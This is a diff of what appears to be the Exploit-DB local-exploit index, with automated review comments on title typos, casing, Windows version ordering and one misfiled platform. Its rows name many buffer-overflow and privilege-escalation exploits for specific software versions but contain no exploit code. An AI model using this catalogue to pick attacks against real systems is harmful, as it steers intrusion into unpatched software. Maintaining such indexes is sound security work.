@@ -6203,7 +6208,7 @@ id,file,description,date,author,platform,type,port
 8789,platforms/windows/local/8789.py,"Slayer 2.4 - (skin) Universal Buffer Overflow (SEH)",2009-05-26,SuNHouSe2,windows,local,0
 8799,platforms/win_x86/local/8799.txt,"PHP 5.2.9 (Windows x86) - Local Safemod Bypass",2009-05-26,Abysssec,win_x86,local,0
 8833,platforms/hardware/local/8833.txt,"Linksys WAG54G2 - Web Management Console Arbitrary Command Execution",2009-06-01,Securitum,hardware,local,0
-8863,platforms/windows/local/8863.c,"Atomix Virtual Dj Pro 6.0 - Stack Buffer Overflow PoC (SEH)",2009-06-03,"fl0 fl0w",windows,local,0
+8863,platforms/windows/local/8863.c,"Atomix Virtual Dj Pro 6.0 - Stack Buffer Overflow (PoC) (SEH)",2009-06-03,"fl0 fl0w",windows,local,0
 8875,platforms/windows/local/8875.txt,"Online Armor < 3.5.0.12 - 'OAmon.sys' Privilege Escalation",2009-06-04,"NT Internals",windows,local,0
 8881,platforms/windows/local/8881.php,"PeaZIP 2.6.1 - Compressed Filename Command Injection",2009-06-05,Nine:Situations:Group,windows,local,0
 8896,platforms/osx/local/8896.c,"Apple Mac OSX xnu 1228.9.59 - Kernel Privilege Escalation",2009-06-08,mu-b,osx,local,0
@@ -6234,7 +6239,7 @@ id,file,description,date,author,platform,type,port
 9199,platforms/windows/local/9199.txt,"Adobe 9.x Related Service - 'getPlus_HelperSvc.exe' Privilege Escalation",2009-07-20,Nine:Situations:Group,windows,local,0
 9207,platforms/linux/local/9207.sh,"PulseAudio setuid - Privilege Escalation",2009-07-20,anonymous,linux,local,0
 9208,platforms/linux/local/9208.txt,"PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Privilege Escalation",2009-07-20,anonymous,linux,local,0
-9215,platforms/windows/local/9215.pl,"Streaming Audio Player 0.9 - (skin) Local Stack Overflow (SEH)",2009-07-20,SkuLL-HackeR,windows,local,0
+9215,platforms/windows/local/9215.pl,"Streaming Audio Player 0.9 - 'skin' Local Stack Overflow (SEH)",2009-07-20,SkuLL-HackeR,windows,local,0
 9216,platforms/windows/local/9216.pl,"Soritong MP3 Player 1.0 - 'SKIN' Local Stack Overflow (SEH)",2009-07-20,SkuLL-HackeR,windows,local,0
 9221,platforms/windows/local/9221.pl,"WINMOD 1.4 - '.lst' Local Buffer Overflow (SEH)",2009-07-21,hack4love,windows,local,0
 9223,platforms/windows/local/9223.txt,"Adobe Acrobat 9.1.2 NOS - Privilege Escalation",2009-07-21,"Jeremy Brown",windows,local,0
@@ -6258,7 +6263,6 @@ id,file,description,date,author,platform,type,port
 9354,platforms/windows/local/9354.pl,"Mediacoder 0.7.1.4486 - '.lst' Universal Buffer Overflow (SEH)",2009-08-04,germaya_x,windows,local,0
 9360,platforms/windows/local/9360.pl,"BlazeDVD 5.1/HDTV Player 6.0 - '.plf' Universal Buffer Overflow (SEH)",2009-08-04,"ThE g0bL!N",windows,local,0
 9363,platforms/linux/local/9363.c,"Linux Kernel < 2.6.14.6 - 'procfs' Kernel Memory Disclosure",2009-08-05,"Jon Oberheide",linux,local,0
-9364,platforms/windows/local/9364.py,"Tuniac 090517c - '.m3u' Local File Crash (PoC)",2009-08-05,Dr_IDE,windows,local,0
 9366,platforms/windows/local/9366.pl,"jetAudio 7.1.9.4030 plus vx - '.m3u' Local Stack Overflow (SEH)",2009-08-05,corelanc0d3r,windows,local,0
 9375,platforms/windows/local/9375.py,"JetAudio 7.1.9.4030 - '.m3u' Universal Stack Overflow (SEH)",2009-08-06,Dr_IDE,windows,local,0
 9377,platforms/windows/local/9377.pl,"A2 Media Player Pro 2.51 - '.m3u' / '.m3l' Universal Local Buffer Overflow (SEH)",2009-08-06,hack4love,windows,local,0
@@ -6392,9 +6396,9 @@ id,file,description,date,author,platform,type,port
 10346,platforms/windows/local/10346.rb,"gAlan 0.2.1 - Universal Buffer Overflow (Metasploit)",2009-12-07,loneferret,windows,local,0
 10353,platforms/windows/local/10353.pl,"Audio Workstation - '.pls' Local Buffer Overflow (SEH)",2009-09-24,germaya_x,windows,local,0
 10359,platforms/windows/local/10359.py,"Audio Workstation 6.4.2.4.0 - '.pls' Universal Local Buffer Overflow",2009-12-09,mr_me,windows,local,0
-10363,platforms/windows/local/10363.rb,"Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit) (1)",2009-12-09,dookie,windows,local,0
+10363,platforms/windows/local/10363.rb,"Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit)",2009-12-09,dookie,windows,local,0
 10371,platforms/windows/local/10371.pl,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (1)",2009-12-10,germaya_x,windows,local,0
-10373,platforms/windows/local/10373.rb,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) (1)",2009-12-10,"loneferret germaya_x",windows,local,0
+10373,platforms/windows/local/10373.rb,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit)",2009-12-10,"loneferret germaya_x",windows,local,0
 10374,platforms/windows/local/10374.pl,"Easy RM to MP3 Converter 2.7.3.700 - Exploit",2009-12-10,"Vinod Sharma",windows,local,0
 10392,platforms/windows/local/10392.rb,"Millenium MP3 Studio 2.0 - '.pls' Universal Stack Overflow (Metasploit)",2009-12-11,dookie,windows,local,0
 10396,platforms/linux/local/10396.pl,"Mozilla Codesighs - Memory Corruption (PoC)",2009-12-12,"Jeremy Brown",linux,local,0
@@ -6422,7 +6426,7 @@ id,file,description,date,author,platform,type,port
 10744,platforms/windows/local/10744.rb,"Media Jukebox 8.0.400 - Buffer Overflow (SEH) (Metasploit)",2009-12-27,dijital1,windows,local,0
 10745,platforms/windows/local/10745.c,"Mini-stream Ripper 3.0.1.1 - '.pls' Local Universal Buffer Overflow",2009-12-27,mr_me,windows,local,0
 10747,platforms/windows/local/10747.py,"Mini-stream Ripper (Windows XP SP2/SP3) - Exploit",2009-12-27,dijital1,windows,local,0
-10748,platforms/windows/local/10748.rb,"Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit) (1)",2009-12-27,dijital1,windows,local,0
+10748,platforms/windows/local/10748.rb,"Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit)",2009-12-27,dijital1,windows,local,0
 10759,platforms/windows/local/10759.pl,"M.J.M. Quick Player 1.2 - Stack Buffer Overflow",2009-12-28,corelanc0d3r,windows,local,0
 10782,platforms/windows/local/10782.pl,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Perl)",2009-12-29,jacky,windows,local,0
 10786,platforms/windows/local/10786.py,"Soritong 1.0 - Universal Buffer Overflow (Python)",2009-12-29,jacky,windows,local,0
@@ -6799,7 +6803,6 @@ id,file,description,date,author,platform,type,port
 16617,platforms/windows/local/16617.rb,"VUPlayer - '.m3u' Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
 16618,platforms/windows/local/16618.rb,"BlazeDVD 5.1 - PLF Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
 16619,platforms/windows/local/16619.rb,"Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
-16620,platforms/windows/local/16620.rb,"Media Jukebox 8.0.400 - Buffer Overflow (SEH) (Metasploit)",2011-01-08,Metasploit,windows,local,0
 16621,platforms/windows/local/16621.rb,"Foxit PDF Reader 4.1.1 - Title Stack Buffer Overflow (Metasploit)",2010-12-16,Metasploit,windows,local,0
 16622,platforms/windows/local/16622.rb,"Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
 16623,platforms/windows/local/16623.rb,"Adobe - 'Doc.media.newPlayer' Use-After-Free (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
@@ -6809,7 +6812,7 @@ id,file,description,date,author,platform,type,port
 16627,platforms/windows/local/16627.rb,"UltraISO - '.cue' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0
 16628,platforms/windows/local/16628.rb,"Fat Player Media Player 0.6b0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
 16629,platforms/windows/local/16629.rb,"VideoLAN VLC Media Player 0.9.4 - TiVo Buffer Overflow (Metasploit)",2011-02-02,Metasploit,windows,local,0
-16631,platforms/windows/local/16631.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (3)",2010-09-25,Metasploit,windows,local,0
+16631,platforms/windows/local/16631.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Index Buffer Overflow (Metasploit) (3)",2010-09-25,Metasploit,windows,local,0
 16632,platforms/windows/local/16632.rb,"ACDSee - '.XPM' File Section Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
 16633,platforms/windows/local/16633.rb,"Steinberg MyMP3Player 3.0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
 16634,platforms/windows/local/16634.rb,"Free Download Manager 3.0 Build 844 - Torrent Parsing Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
@@ -6821,8 +6824,7 @@ id,file,description,date,author,platform,type,port
 16644,platforms/windows/local/16644.rb,"VariCAD 2010-2.05 EN - '.DWB' Stack Buffer Overflow (Metasploit)",2010-04-05,Metasploit,windows,local,0
 16645,platforms/windows/local/16645.rb,"URSoft W32Dasm 8.93 - Disassembler Function Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
 16646,platforms/windows/local/16646.rb,"HT-MP3Player 1.0 - '.HT3' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0
-16648,platforms/windows/local/16648.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
-16650,platforms/windows/local/16650.rb,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
+16648,platforms/windows/local/16648.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Cotent Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
 16651,platforms/windows/local/16651.rb,"AOL 9.5 - Phobos.Playlist Import() Stack Based Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
 16652,platforms/windows/local/16652.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
 16653,platforms/windows/local/16653.rb,"Xion Audio Player 1.0.126 - Unicode Stack Buffer Overflow (Metasploit)",2010-12-16,Metasploit,windows,local,0
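Review bot: The new 16648 title has the typo "Cotent"; it should read `"Microsoft HTML Help Workshop 4.74 - '.hhp' Content Buffer Overflow (Metasploit) (2)"`. The qualifiers this commit adds to tell the four '.hhp' entries apart are also cased inconsistently: 16631 in hunk @@ -6809 gets "Index", while 16683 in hunk @@ -6847 gets lowercase "compiled"; title case throughout ("Compiled") would match how the rest of this file writes descriptions. Since these three rows are meant to be read as a set, fixing the typo and the casing in the same change keeps the disambiguation searchable.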
@@ -6832,7 +6834,6 @@ id,file,description,date,author,platform,type,port
 16658,platforms/windows/local/16658.rb,"VUPlayer - '.cue' Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
 16659,platforms/aix/local/16659.rb,"Cain & Abel 4.9.24 - RDP Buffer Overflow (Metasploit)",2010-11-24,Metasploit,aix,local,0
 16660,platforms/windows/local/16660.rb,"Microsoft Windows - CreateSizedDIBSECTION Stack Buffer Overflow (MS11-006) (Metasploit)",2011-02-08,Metasploit,windows,local,0
-16661,platforms/windows/local/16661.rb,"Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
 16662,platforms/windows/local/16662.rb,"A-PDF WAV to MP3 1.0.0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
 16663,platforms/windows/local/16663.rb,"S.O.M.P.L 1.0 Player - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
 16664,platforms/windows/local/16664.rb,"gAlan 0.2.1 - Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
@@ -6847,14 +6848,13 @@ id,file,description,date,author,platform,type,port
 16673,platforms/windows/local/16673.rb,"Digital Music Pad 8.2.3.3.4 - Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
 16674,platforms/windows/local/16674.rb,"Adobe - Collab.collectEmailInfo() Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
 16675,platforms/windows/local/16675.rb,"AstonSoft DeepBurner - '.dbr' Path Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,local,0
-16676,platforms/windows/local/16676.rb,"Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit) (2)",2011-01-08,Metasploit,windows,local,0
 16677,platforms/windows/local/16677.rb,"CA AntiVirus Engine - CAB Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
 16678,platforms/win_x86/local/16678.rb,"VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,local,0
 16679,platforms/windows/local/16679.rb,"Nuance PDF Reader 6.0 - Launch Stack Buffer Overflow (Metasploit)",2011-01-08,Metasploit,windows,local,0
 16680,platforms/windows/local/16680.rb,"Microsoft Visual Basic - '.VBP' Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
 16681,platforms/windows/local/16681.rb,"Adobe - 'Collab.getIcon()' Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
 16682,platforms/windows/local/16682.rb,"Adobe PDF - Escape EXE Social Engineering (No JavaScript)(Metasploit)",2010-12-16,Metasploit,windows,local,0
-16683,platforms/windows/local/16683.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (4)",2010-09-25,Metasploit,windows,local,0
+16683,platforms/windows/local/16683.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' compiled Buffer Overflow (Metasploit) (4)",2010-09-25,Metasploit,windows,local,0
 16684,platforms/windows/local/16684.rb,"Destiny Media Player 1.61 - PLS .m3u Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0
 16686,platforms/windows/local/16686.rb,"Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)",2011-03-04,Metasploit,windows,local,0
 16687,platforms/windows/local/16687.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
@@ -6903,7 +6903,7 @@ id,file,description,date,author,platform,type,port
 17302,platforms/windows/local/17302.py,"Sonique 1.96 - '.m3u' Buffer Overflow",2011-05-17,sinfulsecurity,windows,local,0
 17306,platforms/windows/local/17306.pl,"SpongeBob SquarePants Typing - Buffer Overflow (SEH)",2011-05-18,"Infant Overflow",windows,local,0
 17313,platforms/windows/local/17313.rb,"Magix Musik Maker 16 - '.mmm' Stack Buffer Overflow (Metasploit)",2011-05-22,Metasploit,windows,local,0
-17329,platforms/windows/local/17329.rb,"Magix Musik Maker 16 - '.mmm' Stack Buffer Overflow (without egg-hunter) (Metasploit)",2011-05-27,"Alexey Sintsov",windows,local,0
+17329,platforms/windows/local/17329.rb,"Magix Musik Maker 16 - '.mmm' Stack Buffer Overflow (Without Egg-Hunter) (Metasploit)",2011-05-27,"Alexey Sintsov",windows,local,0
 17362,platforms/windows/local/17362.cpp,"OpenDrive 1.3.141 - Local Password Disclosure",2011-06-04,"Glafkos Charalambous",windows,local,0
 17364,platforms/windows/local/17364.py,"The KMPlayer 3.0.0.1440 - '.mp3' Buffer Overflow (Windows XP SP3 DEP Bypass)",2011-06-06,"dookie and ronin",windows,local,0
 17383,platforms/windows/local/17383.py,"The KMPlayer 3.0.0.1440 - '.mp3' Buffer Overflow (Windows 7 + ASLR Bypass)",2011-06-11,xsploitedsec,windows,local,0
@@ -6914,7 +6914,7 @@ id,file,description,date,author,platform,type,port
 17459,platforms/windows/local/17459.txt,"Valve Steam Client Application 1559/1559 - Privilege Escalation",2011-06-29,LiquidWorm,windows,local,0
 17473,platforms/windows/local/17473.txt,"Adobe Reader X 10.0.0 < 10.0.1 - Atom Type Confusion Exploit",2011-07-03,Snake,windows,local,0
 17474,platforms/windows/local/17474.txt,"Microsoft Office 2010 - '.RTF' Header Stack Overflow",2011-07-03,Snake,windows,local,0
-17486,platforms/multiple/local/17486.php,"PHP 5.3.6 - Buffer Overflow PoC (ROP)",2011-07-04,"Jonathan Salwan",multiple,local,0
+17486,platforms/multiple/local/17486.php,"PHP 5.3.6 - Buffer Overflow (ROP) (PoC)",2011-07-04,"Jonathan Salwan",multiple,local,0
 17488,platforms/windows/local/17488.txt,"Adobe Reader 5.1 - XFDF Buffer Overflow (SEH)",2011-07-04,extraexploit,windows,local,0
 17489,platforms/windows/local/17489.rb,"Word List Builder 1.0 - Buffer Overflow (Metasploit)",2011-07-04,"James Fitts",windows,local,0
 17492,platforms/windows/local/17492.rb,"Wordtrainer 3.0 - '.ord' Buffer Overflow (Metasploit)",2011-07-05,"James Fitts",windows,local,0
@@ -7422,7 +7422,7 @@ id,file,description,date,author,platform,type,port
 20213,platforms/aix/local/20213.txt,"AIX 4.2/4.3 - netstat -Z Statistic Clearing",2000-09-03,"alex medvedev",aix,local,0
 20542,platforms/windows/local/20542.rb,"GlobalScape CuteZIP - Stack Buffer Overflow (Metasploit)",2012-08-15,Metasploit,windows,local,0
 20230,platforms/sco/local/20230.c,"Tridia DoubleVision 3.0 7.00 - Privilege Escalation",2000-06-24,"Stephen J. Friedl",sco,local,0
-20232,platforms/windows/local/20232.cpp,"Microsoft Windows Server 2000/NT 4 - DLL Search Path",2000-09-18,"Georgi Guninski",windows,local,0
+20232,platforms/windows/local/20232.cpp,"Microsoft Windows NT 4/2000 - DLL Search Path",2000-09-18,"Georgi Guninski",windows,local,0
 20241,platforms/palm_os/local/20241.txt,"Palm OS 3.5.2 - Weak Encryption",2000-09-26,@stake,palm_os,local,0
 20250,platforms/linux/local/20250.c,"LBL Traceroute 1.4 a5 - Heap Corruption (1)",2000-09-28,Dvorak,linux,local,0
 20251,platforms/linux/local/20251.c,"LBL Traceroute 1.4 a5 - Heap Corruption (2)",2000-09-28,"Perry Harrington",linux,local,0
@@ -7629,7 +7629,7 @@ id,file,description,date,author,platform,type,port
 21244,platforms/unix/local/21244.pl,"Tarantella Enterprise 3 - gunzip Race Condition",2002-02-08,"Larry Cashdollar",unix,local,0
 21247,platforms/linux/local/21247.c,"BRU 17.0 - SetLicense Script Insecure Temporary File Symbolic Link",2002-01-26,"Andrew Griffiths",linux,local,0
 21248,platforms/linux/local/21248.txt,"(Linux Kernel 2.4.17-8) User-Mode Linux - Memory Access Privilege Escalation",2000-08-25,"Andrew Griffiths",linux,local,0
-21258,platforms/linux/local/21258.bat,"Microsoft Windows Server 2000/NT 4 - NTFS File Hiding",2002-01-29,"Hans Somers",linux,local,0
+21258,platforms/linux/local/21258.bat,"Microsoft Windows NT 4/2000 - NTFS File Hiding",2002-01-29,"Hans Somers",linux,local,0
 21259,platforms/linux/local/21259.java,"Sun Java Virtual Machine 1.2.2/1.3.1 - Segmentation Violation",2002-01-30,"Taeho Oh",linux,local,0
 21280,platforms/linux/local/21280.c,"Hanterm 3.3 - Local Buffer Overflow (1)",2002-02-07,Xpl017Elz,linux,local,0
 21281,platforms/linux/local/21281.c,"Hanterm 3.3 - Local Buffer Overflow (2)",2002-02-07,xperc,linux,local,0
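Review bot: The 21258 row is retitled "Microsoft Windows NT 4/2000 - NTFS File Hiding" but keeps the path `platforms/linux/local/21258.bat` and a platform column of `linux`; a Windows batch file about NTFS filed under linux looks like a mis-categorisation that the rename leaves in place. Since the row is being edited anyway, the platform column (presumably `windows`, to be confirmed against the entry) is worth correcting in the same change, with the file path moved to match — this page cannot show whether the path move is part of the commit.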
@@ -7645,7 +7645,7 @@ id,file,description,date,author,platform,type,port
 21331,platforms/windows/local/21331.py,"NCMedia Sound Editor Pro 7.5.1 - MRUList201202.dat File Handling Buffer Overflow",2012-09-17,"Julien Ahrens",windows,local,0
 21341,platforms/linux/local/21341.c,"Ecartis 1.0.0/0.129 a Listar - Multiple Local Buffer Overflow Vulnerabilities (1)",2002-02-27,"the itch",linux,local,0
 21342,platforms/linux/local/21342.c,"Ecartis 1.0.0/0.129 a Listar - Multiple Local Buffer Overflow Vulnerabilities (2)",2002-02-27,"the itch",linux,local,0
-21344,platforms/windows/local/21344.txt,"Microsoft Windows Server 2000/NT 4.0 - Process Handle Local Privilege Elevation",2002-03-13,EliCZ,windows,local,0
+21344,platforms/windows/local/21344.txt,"Microsoft Windows NT 4/2000 - Process Handle Local Privilege Elevation",2002-03-13,EliCZ,windows,local,0
 21347,platforms/php/local/21347.php,"PHP 3.0.x/4.x - Move_Uploaded_File open_basedir Circumvention",2002-03-17,Tozz,php,local,0
 21348,platforms/linux/local/21348.txt,"Webmin 0.x - Code Input Validation",2002-03-20,prophecy,linux,local,0
 21351,platforms/windows/local/21351.pl,"WorkforceROI Xpede 4.1/7.0 - Weak Password Encryption",2002-03-22,c3rb3r,windows,local,0
@@ -7702,14 +7702,14 @@ id,file,description,date,author,platform,type,port
 40429,platforms/windows/local/40429.cs,"Microsoft Windows 10 10586 (x86/x64) / 8.1 Update 2 - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",windows,local,0
 21674,platforms/linux/local/21674.c,"William Deich Super 3.x - SysLog Format String",2002-07-31,gobbles,linux,local,0
 21683,platforms/linux/local/21683.c,"qmailadmin 1.0.x - Local Buffer Overflow",2002-08-06,"Thomas Cannon",linux,local,0
-21684,platforms/windows/local/21684.c,"Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (1)",2002-08-06,sectroyer,windows,local,0
-21685,platforms/windows/local/21685.c,"Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (2)",2002-08-06,"Oliver Lavery",windows,local,0
-21686,platforms/windows/local/21686.c,"Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (3)",2002-08-06,"Brett Moore",windows,local,0
-21687,platforms/windows/local/21687.c,"Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (4)",2002-08-06,"Brett Moore",windows,local,0
-21688,platforms/windows/local/21688.c,"Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (5)",2002-08-06,"Oliver Lavery",windows,local,0
-21689,platforms/windows/local/21689.c,"Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (6)",2002-08-06,"Brett Moore",windows,local,0
-21690,platforms/windows/local/21690.txt,"Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (7)",2002-08-06,"Ovidio Mallo",windows,local,0
-21691,platforms/windows/local/21691.txt,"Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (8)",2002-08-06,anonymous,windows,local,0
+21684,platforms/windows/local/21684.c,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (1)",2002-08-06,sectroyer,windows,local,0
+21685,platforms/windows/local/21685.c,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (2)",2002-08-06,"Oliver Lavery",windows,local,0
+21686,platforms/windows/local/21686.c,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (3)",2002-08-06,"Brett Moore",windows,local,0
+21687,platforms/windows/local/21687.c,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (4)",2002-08-06,"Brett Moore",windows,local,0
+21688,platforms/windows/local/21688.c,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (5)",2002-08-06,"Oliver Lavery",windows,local,0
+21689,platforms/windows/local/21689.c,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (6)",2002-08-06,"Brett Moore",windows,local,0
+21690,platforms/windows/local/21690.txt,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (7)",2002-08-06,"Ovidio Mallo",windows,local,0
+21691,platforms/windows/local/21691.txt,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (8)",2002-08-06,anonymous,windows,local,0
 21700,platforms/linux/local/21700.c,"ISDN4Linux 3.1 - IPPPD Device String SysLog Format String (1)",2002-08-10,"Gobbles Security",linux,local,0
 21701,platforms/linux/local/21701.pl,"ISDN4Linux 3.1 - IPPPD Device String SysLog Format String (2)",2002-08-10,"TESO Security",linux,local,0
 21713,platforms/windows/local/21713.py,"NCMedia Sound Editor Pro 7.5.1 - (SEH + DEP Bypass)",2012-10-03,b33f,windows,local,0
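Review bot: The version ordering chosen here, "Microsoft Windows XP/2000/NT 4" (21684–21691, and again for 21922/21923 in hunk @@ -7752), runs newest-first, while the same commit normalises the two-version titles to oldest-first "Microsoft Windows NT 4/2000" in hunks @@ -7422, @@ -7629, @@ -7645, @@ -7959 and @@ -7978. One direction should be used for both shapes; extending the ascending form gives `"Microsoft Windows NT 4/2000/XP - Window Message Subsystem Design Error (1)"` and likewise for the other nine rows. The untouched 1911 row in hunk @@ -5745 already reads "XP/2000", so the file holds both orders today — presumably a naming convention outside this page decides, and it is worth citing in the commit message either way.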
@@ -7752,8 +7752,8 @@ id,file,description,date,author,platform,type,port
 21887,platforms/windows/local/21887.php,"PHP 5.3.4 Win Com Module - Com_sink Exploit",2012-10-11,fb1h2s,windows,local,0
 21892,platforms/windows/local/21892.txt,"FileBound 6.2 - Privilege Escalation",2012-10-11,"Nathaniel Carew",windows,local,0
 21904,platforms/aix/local/21904.pl,"IBM AIX 4.3.x/5.1 - ERRPT Local Buffer Overflow",2003-04-16,watercloud,aix,local,0
-21922,platforms/windows/local/21922.c,"Microsoft Windows Server 2000/NT 4/XP - NetDDE Privilege Escalation (1)",2002-10-09,Serus,windows,local,0
-21923,platforms/windows/local/21923.c,"Microsoft Windows Server 2000/NT 4/XP - NetDDE Privilege Escalation (2)",2002-10-09,Serus,windows,local,0
+21922,platforms/windows/local/21922.c,"Microsoft Windows XP/2000/NT 4 - NetDDE Privilege Escalation (1)",2002-10-09,Serus,windows,local,0
+21923,platforms/windows/local/21923.c,"Microsoft Windows XP/2000/NT 4 - NetDDE Privilege Escalation (2)",2002-10-09,Serus,windows,local,0
 21980,platforms/linux/local/21980.c,"Abuse 2.0 - Local Buffer Overflow",2002-11-01,Girish,linux,local,0
 21988,platforms/windows/local/21988.pl,"Huawei Technologies Internet Mobile - Unicode SEH Exploit",2012-10-15,Dark-Puzzle,windows,local,0
 21994,platforms/windows/local/21994.rb,"Microsoft Windows - Escalate Service Permissions Privilege Escalation (Metasploit)",2012-10-16,Metasploit,windows,local,0
@@ -7959,7 +7959,7 @@ id,file,description,date,author,platform,type,port
 23910,platforms/windows/local/23910.txt,"F-Secure BackWeb 6.31 - Privilege Escalation",2004-04-06,"Ian Vitek",windows,local,0
 23921,platforms/windows/local/23921.c,"Centrinity FirstClass Desktop Client 7.1 - Local Buffer Overflow",2004-04-07,I2S-LaB,windows,local,0
 40400,platforms/windows/local/40400.txt,"SolarWinds Kiwi CatTools 3.11.0 - Unquoted Service Path Privilege Escalation",2016-09-19,"Halil Dalabasmaz",windows,local,0
-23989,platforms/windows/local/23989.c,"Microsoft Windows Server 2000/NT 4 - Local Descriptor Table Privilege Escalation (MS04-011)",2004-04-18,mslug@safechina.net,windows,local,0
+23989,platforms/windows/local/23989.c,"Microsoft Windows NT 4/2000 - Local Descriptor Table Privilege Escalation (MS04-011)",2004-04-18,mslug@safechina.net,windows,local,0
 23996,platforms/windows/local/23996.py,"Inmatrix Ltd. Zoom Player 8.5 - '.jpeg' Exploit",2013-01-09,"Debasish Mandal",windows,local,0
 24014,platforms/windows/local/24014.bat,"Symantec Norton AntiVirus 2002 - Nested File Manual Scan Bypass",2004-04-17,"Bipin Gautam",windows,local,0
 24015,platforms/bsd/local/24015.c,"BSD-Games 2.x - Mille Local Save Game File Name Buffer Overrun",2004-04-17,N4rK07IX,bsd,local,0
@@ -7978,7 +7978,7 @@ id,file,description,date,author,platform,type,port
 24207,platforms/windows/local/24207.c,"Nvidia Display Driver Service (Nsvr) - Exploit",2013-01-18,"Jon Bailey",windows,local,0
 24210,platforms/hp-ux/local/24210.pl,"HP-UX 7-11 - Local X Font Server Buffer Overflow",2003-03-10,watercloud,hp-ux,local,0
 24258,platforms/windows/local/24258.txt,"Aloaha Credential Provider Monitor 5.0.226 - Privilege Escalation",2013-01-20,LiquidWorm,windows,local,0
-24277,platforms/windows/local/24277.c,"Microsoft Windows Server 2000/NT 4 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020)",2004-07-16,bkbll,windows,local,0
+24277,platforms/windows/local/24277.c,"Microsoft Windows NT 4/2000 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020)",2004-07-16,bkbll,windows,local,0
 24278,platforms/linux/local/24278.sh,"IM-Switch - Insecure Temporary File Handling Symbolic Link",2004-07-13,"SEKINE Tatsuo",linux,local,0
 24293,platforms/sco/local/24293.c,"SCO Multi-channel Memorandum Distribution Facility - Multiple Vulnerabilities",2004-07-20,"Ramon Valle",sco,local,0
 24335,platforms/unix/local/24335.txt,"Oracle9i Database - Default Library Directory Privilege Escalation",2004-07-30,"Juan Manuel Pascual Escribá",unix,local,0
@@ -8119,7 +8119,7 @@ id,file,description,date,author,platform,type,port
